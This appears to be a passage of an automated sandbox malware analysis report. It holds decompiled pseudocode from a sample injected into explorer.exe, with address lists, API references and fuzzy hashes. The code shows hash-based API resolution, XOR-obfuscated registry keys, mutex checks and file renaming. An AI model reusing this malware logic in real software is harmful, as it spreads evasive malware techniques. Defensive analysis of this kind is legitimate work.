				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                            0x0008dfb6
                            0x0008dfb8
                            0x0008dfbb
                            0x0008dfbe
                            0x0008dfc4
                            0x0008e021
                            0x00000000
                            0x0008e021
                            0x0008dfc6
                            0x0008dfd1
                            0x0008dfd4
                            0x0008dfd9
                            0x0008dfde
                            0x0008dfe1
                            0x0008dfe3
                            0x0008dfe6
                            0x0008dfe9
                            0x0008dfee
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008dff0
                            0x0008dff0
                            0x0008e002
                            0x0008e00f
                            0x0008e013
                            0x00000000
                            0x00000000
                            0x0008e015
                            0x0008e018
                            0x0008e019
                            0x0008e01f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e01f
                            0x0008e036
                            0x0008e03b
                            0x0008e03f
                            0x00000000
                            0x0008e04b
                            0x0008e04b
                            0x0008e04d
                            0x0008e04d
                            0x0008e053
                            0x00000000
                            0x00000000
                            0x0008e059
                            0x0008e05d
                            0x0008e061
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e061
                            0x0008e067
                            0x0008e06f
                            0x0008e074
                            0x0008e077
                            0x0008e077
                            0x0008e079
                            0x0008e07d
                            0x0008e085
                            0x00000000
                            0x00000000
                            0x0008e089
                            0x0008e091
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e091

                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                            • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                            • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                            • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 543 89b43-89b75 call 88604 546 89b7e-89b9e call 8b5f6 543->546 547 89b77-89b79 543->547 551 89ba0 546->551 552 89ba3-89bb8 call 895c7 546->552 548 89e1a-89e1e 547->548 551->552 555 89cee-89cfb 552->555 556 89bbe-89bd6 552->556 557 89d3c-89d4c call 89292 555->557 558 89cfd-89d1e 555->558 562 89ceb 556->562 563 89bdc-89bf8 556->563 565 89d4f-89d51 557->565 566 89d20-89d3a call 89292 558->566 567 89d54-89d74 call 885c2 RegOpenKeyExA 558->567 562->555 563->567 573 89bfe-89c18 call 89292 563->573 565->567 566->565 574 89dc8-89dcd 567->574 575 89d76-89d8b RegCreateKeyA 567->575 580 89d8d-89db2 call 8861a memset call 8861a 573->580 586 89c1e-89c36 573->586 577 89dcf 574->577 578 89dd5 574->578 579 89dba-89dbf 575->579 575->580 577->578 584 89dd8-89df4 call 8c379 578->584 582 89dc1 579->582 583 89dc3-89dc6 579->583 580->579 582->583 583->584 599 89e0b-89e18 call 8861a 584->599 600 89df6-89e09 584->600 593 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 586->593 594 89cab-89cb0 586->594 615 89c8b-89ca9 call 8861a * 2 593->615 616 89c7e-89c83 593->616 598 89cb6-89ce9 call 89292 call 8861a 594->598 598->567 599->548 600->599 600->600 615->598 616->615 617 89c85 616->617 617->615
                            C-Code - Quality: 89%
                            			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0xc2fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0xc2fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0xc2fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0xc2fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0xc2fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0xc2fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0xc2fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0xc2f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}



















































                            0x00089b4c
                            0x00089b4e
                            0x00089b51
                            0x00089b53
                            0x00089b5b
                            0x00089b5e
                            0x00089b65
                            0x00089b6d
                            0x00089b6f
                            0x00089b75
                            0x00089b7e
                            0x00089b86
                            0x00089b8c
                            0x00089b93
                            0x00089b99
                            0x00089b9b
                            0x00089b9e
                            0x00089ba0
                            0x00089ba0
                            0x00089ba0
                            0x00089ba8
                            0x00089bab
                            0x00089bb0
                            0x00089bb3
                            0x00089bb6
                            0x00089bb8
                            0x00089cee
                            0x00089cee
                            0x00089cf4
                            0x00089cfb
                            0x00089d3c
                            0x00089d40
                            0x00089d41
                            0x00089d47
                            0x00089d4c
                            0x00089d4f
                            0x00089d4f
                            0x00089d51
                            0x00000000
                            0x00089d51
                            0x00089d00
                            0x00089d0a
                            0x00089d13
                            0x00089d18
                            0x00089d1b
                            0x00089d1e
                            0x00000000
                            0x00000000
                            0x00089d20
                            0x00089d24
                            0x00089d25
                            0x00089d2a
                            0x00089d2b
                            0x00089d2e
                            0x00089d32
                            0x00089d37
                            0x00000000
                            0x00089bbe
                            0x00089bbe
                            0x00089bcb
                            0x00089bd1
                            0x00089bd4
                            0x00089bd6
                            0x00089ceb
                            0x00000000
                            0x00089ceb
                            0x00089bdf
                            0x00089be3
                            0x00089beb
                            0x00089bf2
                            0x00089bf5
                            0x00089bf8
                            0x00089d54
                            0x00089d57
                            0x00089d6f
                            0x00089d72
                            0x00089d74
                            0x00089dc8
                            0x00089dcb
                            0x00089dcd
                            0x00089dcf
                            0x00089dcf
                            0x00089dd5
                            0x00089dd8
                            0x00089dd8
                            0x00089ddd
                            0x00089de4
                            0x00089dea
                            0x00089def
                            0x00089df2
                            0x00089df4
                            0x00089e0b
                            0x00089e11
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00089df6
                            0x00089df6
                            0x00089e02
                            0x00089e06
                            0x00089e07
                            0x00089e07
                            0x00000000
                            0x00089df6
                            0x00089d79
                            0x00089d86
                            0x00089d89
                            0x00089d8b
                            0x00089dba
                            0x00089dbd
                            0x00089dbf
                            0x00089dc1
                            0x00089dc1
                            0x00089dc3
                            0x00000000
                            0x00089dc3
                            0x00089d8d
                            0x00089d96
                            0x00089da2
                            0x00089dad
                            0x00000000
                            0x00089db2
                            0x00089bfe
                            0x00089bff
                            0x00089c02
                            0x00089c07
                            0x00089c0b
                            0x00089c10
                            0x00089c13
                            0x00089c16
                            0x00089c18
                            0x00000000
                            0x00000000
                            0x00089c29
                            0x00089c31
                            0x00089c34
                            0x00089c36
                            0x00089cab
                            0x00089cb3
                            0x00089c38
                            0x00089c3a
                            0x00089c49
                            0x00089c51
                            0x00089c57
                            0x00089c5a
                            0x00089c62
                            0x00089c65
                            0x00089c6f
                            0x00089c72
                            0x00089c77
                            0x00089c7a
                            0x00089c7c
                            0x00089c7e
                            0x00089c81
                            0x00089c83
                            0x00089c85
                            0x00089c85
                            0x00089c83
                            0x00089c91
                            0x00089c9c
                            0x00089ca1
                            0x00089ca4
                            0x00089ca4
                            0x00089cc3
                            0x00089cc8
                            0x00089cce
                            0x00089cd1
                            0x00089cd3
                            0x00089cd9
                            0x00089ce2
                            0x00000000
                            0x00089ce8
                            0x00089bb8
                            0x00089b77
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                            • Opcode Fuzzy Hash: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                            0x0008b99b
                            0x0008b99c
                            0x0008b9a3
                            0x0008b9ab
                            0x0008b9af
                            0x0008b9b8
                            0x0008b9fe
                            0x0008b9fe
                            0x0008b9c5
                            0x0008b9cd
                            0x0008b9cf
                            0x0008b9d5
                            0x0008b9ee
                            0x00000000
                            0x0008b9f0
                            0x0008b9f5
                            0x00000000
                            0x0008b9fb
                            0x0008b9d7
                            0x0008b9d7
                            0x0008b9d7
                            0x0008b9d7
                            0x0008b9d5
                            0x0008ba04

                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                            • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocateErrorHeapLast
                            • String ID:
                            • API String ID: 2499131667-0
                            • Opcode ID: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                            • Opcode Fuzzy Hash: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0xc2f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








                            0x00085910
                            0x00085915
                            0x00085921
                            0x0008592e
                            0x00085932
                            0x0008594a
                            0x0008596a
                            0x0008596b
                            0x0008595a
                            0x0008595a
                            0x00085960
                            0x00085960
                            0x00085934
                            0x00085934
                            0x0008593a
                            0x0008593a
                            0x00085917
                            0x00085917
                            0x00085917
                            0x00085973

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                            • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID:
                            • API String ID: 1925916568-0
                            • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                            • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






                            0x0008a47d
                            0x0008a485
                            0x0008a489
                            0x0008a4a0
                            0x0008a4af
                            0x0008a4b5
                            0x0008a4b8
                            0x0008a4b8
                            0x00000000
                            0x0008a4ba
                            0x0008a48b
                            0x00000000

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                            • GetLastError.KERNEL32 ref: 0008A48B
                            • GetLastError.KERNEL32 ref: 0008A495
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CreateMutex
                            • String ID:
                            • API String ID: 200418032-0
                            • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                            • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0xc2fc08
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0xc2f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0xc2fc08
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0xc2fc08
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























                            0x00086da0
                            0x00086da6
                            0x00086dac
                            0x00086db9
                            0x00086dba
                            0x00086dbb
                            0x00086dc2
                            0x00086dc8
                            0x00086dcd
                            0x00086dcf
                            0x00086dd1
                            0x00086ddd
                            0x00086de2
                            0x00086de2
                            0x00086de7
                            0x00086de9
                            0x00086dea
                            0x00086df4
                            0x00086dfa
                            0x00086dff
                            0x00086e01
                            0x00086e04
                            0x00086e0a
                            0x00086e10
                            0x00086e10
                            0x00086e26
                            0x00086e2a
                            0x00000000
                            0x00000000
                            0x00086e39
                            0x00086e42
                            0x00086e42
                            0x00086e46
                            0x00086e4b
                            0x00086e52
                            0x00086e57
                            0x00086e5d
                            0x00086e62
                            0x00086e6a
                            0x00086e72
                            0x00086ec0
                            0x00086ec7
                            0x00086ec9
                            0x00086ecd
                            0x00000000
                            0x00086ecd
                            0x00086e74
                            0x00086e74
                            0x00086e7c
                            0x00086e7d
                            0x00086e82
                            0x00086e84
                            0x00086e96
                            0x00086ea7
                            0x00086eac
                            0x00086eb5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00086e84
                            0x00086e72
                            0x00000000
                            0x00086e57
                            0x00086ede
                            0x00086ee4
                            0x00086e0a
                            0x00086eeb

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileMove
                            • String ID: %s.%u
                            • API String ID: 3562171763-1288070821
                            • Opcode ID: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                            • Opcode Fuzzy Hash: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0xc0f588
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0xc0f588
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















                            0x00082af0
                            0x00082afa
                            0x00082afd
                            0x00082b00
                            0x00082b05
                            0x00082b07
                            0x00082b0d
                            0x00082b17
                            0x00082b1d
                            0x00082b1f
                            0x00082b24
                            0x00082b81
                            0x00082b87
                            0x00082b8b
                            0x00082b96
                            0x00000000
                            0x00082b9d
                            0x00082b26
                            0x00082b28
                            0x00082b28
                            0x00082b31
                            0x00082b35
                            0x00082b3d
